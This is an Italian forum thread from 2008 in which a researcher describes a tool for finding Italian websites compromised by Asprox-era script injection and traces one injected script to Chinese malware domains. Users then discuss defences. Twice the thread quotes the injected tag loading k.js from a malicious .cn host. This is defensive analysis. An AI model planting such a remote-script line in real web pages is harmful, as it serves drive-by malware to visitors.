[NEWS] Utilizzo di tools per automatizzare la ricerca malware

[Edgar Bangkok]

13 giugno 2008

Da qualche giorno sto testando un ulteriore 'improvement” di uno dei miei tools che consiste nella possibilita' di effettuare ricerche in rete e download del codice sorgente delle pagine trovate, passando non manualmente una singola stringa al motore di ricerca, ma una serie di parole chiave tratte da un file txt letto sequenzialmente.

Questa nuova modifica ad uno dei tools si e' resa necessaria dalla ormai enorme quantita' di differenti urls (si supera il centinaio di differenti indirizzi pericolosi) presenti come link a malware in javascript inseriti all'interno del codice di normali siti web. (es. con l'ultimo recente attacco a siti anche .IT suportato dalla botnet Asprox)

In pratica ora il tools estrae da un elenco TXT quello che deve passare al motore di ricerca come chiave automatizzando una operazione che se eseguita manualmente comporterebbe molto piu' tempo e successivamente scarica il sorgente html del sito per ulteriori verifiche.

Questa una schermata che riassume i vari passaggi dalla lista di links prericolosi (1) al caricamento del file java pericoloso per esaminarne il codice.(4)
(img sul blog)
A questo punto il problema diventa solo, si fa per dire, estrarre dalla enorme quantita' di dati raccolta in poco tempo con il tool, i casi piu' significativi ed eventualmente non ancora evidenziati in precedenza.

Ma passiamo ora ad un caso concreto di utilizzo del tool:

Questo un esempio dell'output del tools
(img sul blog)
Prendiamo un link a caso di quelli che sembrano contenere un codice script che potrebbe ( sicuramente ) essere pericoloso.
Questa la pagina interessata che come si vede e' una normale pagina web
(img sul blog)
di una ATC, dove esaminando il codice sorgente troviamo diversi scripts (k.js) che puntano a sito cinese
(img sul blog)
Questa volta il file java e' diverso dal solto b.js che conosciamo bene per essere sempre presente negli ultimi attacchi asprox.
(img sul blog)
Una volta caricato lo script k.js possiamo decodificarne il codice offuscato che punta a sito sempre .cn
(img sul blog)

(questo un whois)
(img sul blog)

sito che anche esaminato superficialmente, dimostra di linkare, tra l'altro questo file flash
(img sul blog)

che con VT dimostra tutta la sua pericolosita' (presumibile exploit ai danni di versioni non aggiornate del player flash) ed anche il fatto di essere poco conosciuto ai softwares antivirus
(img sul blog)

Questo e' solo uno dei circa 950 files sorgenti sospetti di malware scaricati in circa un'ora di funzionamento del tool e che porta ad un report finale di files filtrati, per evitare di elaborare anche file di siti bonificati, di circa 150 files sorgenti di pagine web sicuramente riconducibili a pagine con javascript o comunque links a pagine malware.
(img sul blog)
Come si vede, e considerando che la scansione era filtrata anche solo per domini .IT e non piu' di 100 links risultato per singola chiave di ricerca, il rischio di 'beccarsi' un malware navigando in rete su 'normali' siti diventa ogni giorno piu' attuale.

Edgar

fonte: http://edetools.blogspot.com/

[matteo1]

ciao ne ho parlato ieri per eserci finito nella pagina web della società di trasporti della mia città
http://www.hwupgrade.it/forum/showthread.php?t=1763095
quello che mi chiedo è come lo script possa infettare,perchè viene visualizzata la scritta
<script src=http://www.fengnima.cn/k.js></script>
ma non è cliccabile

Altro sito "infettato" è quello di italia7 gold

[Edgar Bangkok]

Quote:

quello che mi chiedo è come lo script possa infettare,perchè viene visualizzata la scritta
<script src=http://www.fengnima.cn/k.js></script>
ma non è cliccabile

In effetti un codice javascript visualizzato come testo sulla pagina non dovrebbe creare problemi in quanto normalmente non dovrebbe essere eseguito quando compare in quel modo all'interno del codice della pagina.
Tra l'altro ultimamente si trovano su siti compromessi codici java che sono inseriti anche nel titolo o nei meta tags del codice html.
Mentre né <title> ne <meta tag> sono stati concepiti per utilizzare <script>, sembra ad esempio che alcuni browser potrebbero interpretare, erroneamente, qualsiasi script ovunque esso sia collocato.
Inoltre in ogni caso la presenza di codice script malevolo anche visualizzato come testo indica che su quella pagina potrebbe essercene altro inserito correttamente nel codice ed eseguibile appena caricata la pagina e comunque in certi casi o con certi browser non e' escluso che potrebbero esserci problemi.

Edgar

[matteo1]

quindi finchè restano solo scritte è come se fossero una sorta di "defacement"

[Edgar Bangkok]

Direi che dovrebbe essere come dici a meno che il browser le interpreti come codice e le esegua, ma mi pare poco probabile.
Tieni pero' conto che se comapaiono le scritte stile defacement quasi sicuramente ci sono anche codici script completi e che possono essere eseguiti.
Comunque , per esperienza personale, se usi firefox con noscript attivato per questo genere di attacchi sei al sicuro.
Il problema succede di solito per quei siti che si ritengono sicuri perche' sono anni che li conosciamo e li visitiamo e magari abbiamo gli script o Noscript che gli ha abilitati e allora e' il momento che si viene 'fregati'....

Edgar

[Ignorante Informatico]

Quote:

Originariamente inviato da Edgar Bangkok

..allora e' il momento che si viene 'fregati'....

In quei casi (visita a siti 'sicuri'), consigli di andare di HIPS ed eventuali BlackList (se proprio non si installa una sandbox)?

[Edgar Bangkok]

Potrebbe essere una soluzione da abbinare all'uso sia del browser che del software installato sul pc aggiornato con tutte le patch di sicurezza rilasciate e con l'uso esempio di noscript per bloccare eventuali script che venissero eseguiti a nostra insaputa.
L'uso delle blacklist mi pare valido ma devono essere aggiornate piu che di giorno in giorno ormai quasi di ora in ora e quindi anche loro usate da sole presentano limiti.
Quindi secondo me' usando un mix di software che comprenda antivirus con capacita (euristica , proattiva ....) di prevenire intrusioni sul sistema piu l'uso di blacklist, di un buon firewall e blocco scripts (es. noscript) dovrebbe garantire una buona protezione senza dimenticare che forse la soluzione piu facile e tra le piu' sicure e' eseguire il browser in un ambiente virtuale come sandboxie
Da quanto leggo in rete sembra che sandboxie si sia dimostrata molto robusta in caso di esecuzione di codici pericolosi al suo interno senza contare che alla sua chiusura tutto quello che e' stato scaricato sul pc viene eliminato.
Come ho gia scritto altre volte usare firefox con noscript in sandboxie garantisce una protezione notevole contro il malware circolante in rete ed in oltre un anno di 'esperimenti' che ho fatto andando a visitare siti compromessi di tutti i generi non ho mai avuto un solo problema usando questa configurazione.

[Ignorante Informatico]

Grazie per la risposta (più che esauriente), Edgar Bangkok!